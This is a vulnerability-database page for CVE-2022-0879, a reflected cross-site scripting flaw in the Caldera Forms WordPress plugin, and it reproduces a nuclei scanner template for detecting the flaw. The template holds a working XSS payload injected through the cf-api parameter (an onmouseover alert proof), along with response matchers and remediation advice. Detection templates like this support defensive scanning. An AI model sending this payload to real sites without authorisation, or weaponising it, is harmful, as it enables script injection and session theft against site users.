Lucene search
K

Caldera Forms < 1.9.7 - Reflected Cross-Site Scripting

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Caldera Forms below 1.9.7 has reflected cross site scripting via the cf-api parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0879
18 Apr 202218:15
attackerkb
Circl
CVE-2022-0879
18 Apr 202222:23
circl
CNNVD
WordPress plugin Caldera Forms跨站脚本漏洞
18 Apr 202200:00
cnnvd
CNVD
WordPress plugin Caldera Forms cross-site scripting vulnerability
19 Apr 202200:00
cnvd
CVE
CVE-2022-0879
18 Apr 202217:10
cve
Cvelist
CVE-2022-0879 Caldera Forms < 1.9.7 - Reflected Cross-Site Scripting
18 Apr 202217:10
cvelist
EUVD
EUVD-2022-15916
3 Oct 202520:07
euvd
NVD
CVE-2022-0879
18 Apr 202218:15
nvd
OSV
CVE-2022-0879
18 Apr 202218:15
osv
Patchstack
WordPress Caldera Forms plugin <= 1.9.6 - Reflected Cross-Site Scripting (XSS) vulnerability
28 Mar 202200:00
patchstack
Rows per page
id: CVE-2022-0879

info:
  name: Caldera Forms < 1.9.7 - Reflected Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
    Caldera Forms WordPress plugin < 1.9.7 contains a reflected cross-site scripting caused by lack of validation and escaping of the cf-api parameter in responses, letting attackers execute arbitrary scripts in victim's browser, exploit requires attacker to craft a malicious request.
  impact: |
    Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
    Update to version 1.9.7 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0879
    - https://wpscan.com/vulnerability/10e8e92a-4e1d-4e9c-8b3e-e8c5e0e0e0e0
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0879
    cwe-id: CWE-79
    epss-score: 0.01168
    epss-percentile: 0.63416
    cpe: cpe:2.3:a:calderaforms:caldera_forms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
  tags: wpscan,cve,cve2022,wordpress,xss,caldera-forms,reflected,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/?cf-api=%22%20style=position:fixed;left:0;top:0;right:0;bottom:0;%20onmouseover=alert(1)%20x"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "onmouseover=alert(1)", "caldera", " style=position:fixed")'
          - '!regex(body, "value=[\"\\\\]*/?cf-api=")'
        condition: and
# digest: 490a0046304402204550b420b7a6aa359050fd817b942fed85eefeb28f17c52acc9d6e7b01a1cc8e02207cdcb013bb845463419231e4060460c2359cf8473c881721730fad380624884e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.01168
15